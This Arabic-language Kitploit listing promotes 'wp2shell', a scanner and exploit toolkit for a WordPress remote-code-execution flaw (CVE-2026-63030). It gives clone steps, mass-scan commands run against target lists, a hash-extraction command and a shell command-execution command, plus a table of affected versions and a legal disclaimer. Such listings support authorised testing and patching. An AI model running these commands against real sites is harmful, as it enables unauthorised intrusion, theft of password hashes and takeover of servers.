Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp2shell — wp2shell - أداة استغلال وماسح ضوئي لثغرة WordPress CVE-2026-63030 | Kitploit
أدوات/GitHubGitHub/lutfifakee-project/wp2shell
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - أداة استغلال وماسح ضوئي لثغرة WordPress CVE-2026-63030

عرض المستودع
61منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔍 wp2shell - ماسح ومستغل ثغرات WordPress CVE-2026-63030

⚡ ماسح ومستغل ثغرات سريع وفوري لـ CVE-2026-63030 (wp2shell)


📌 نظرة عامة

wp2shell عبارة عن مجموعة أدوات شاملة لاكتشاف واستغلال CVE-2026-63030، وهي ثغرة حرجة في WordPress تسمح للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عن بُعد عبر ارتباك مسار الدُفعات في REST API مقترنًا بحقن SQL.

🔍 ما هي CVE-2026-63030؟

CVE-2026-63030 (wp2shell) هي ثغرة حرجة اكتشفها Adam Kues (Assetnote / Searchlight Cyber) وتؤثر على نواة WordPress. تجمع بين خطأين:

  1. GHSA-ff9f-jf42-662q - ارتباك مسار الدُفعات في REST
  2. GHSA-fpp7-x2x2-2mjf - حقن SQL في author__not_in

📊 الإصدارات المتأثرة



📦 الاستنساخ والإعداد

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ الأدوات المتضمنة

1️⃣ wp2shell_scanner.py - ماسح سريع

ماسح فوري متعدد الخيوط لاكتشاف الثغرات على نطاق واسع.

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - استغلال INTO OUTFILE

يوضح متغير RCE الخاص بـ INTO OUTFILE (يتطلب صلاحية FILE في MySQL).

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - استغلال بملف واحد

نسخة محمولة بملف واحد من الاستغلال مع وظائف كاملة.

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ إخلاء مسؤولية قانوني

مهم: هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط.

  • استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
  • لا يتحمل المطورون أي مسؤولية عن إساءة استخدام هذا البرنامج. استخدمها بمسؤولية وأخلاقية.
تنزيل الأداة
نطاق الإصدارالتأثيرالحالة
6.9.0 - 6.9.4🔴 RCE (حرجة)❌ عرضة للخطر
7.0.0 - 7.0.1🔴 RCE (حرجة)❌ عرضة للخطر
6.8.0 - 6.8.5🟡 SQLi (عالية)❌ عرضة للخطر
6.9.5+ / 7.0.2+✅ تم التصحيح✅ آمن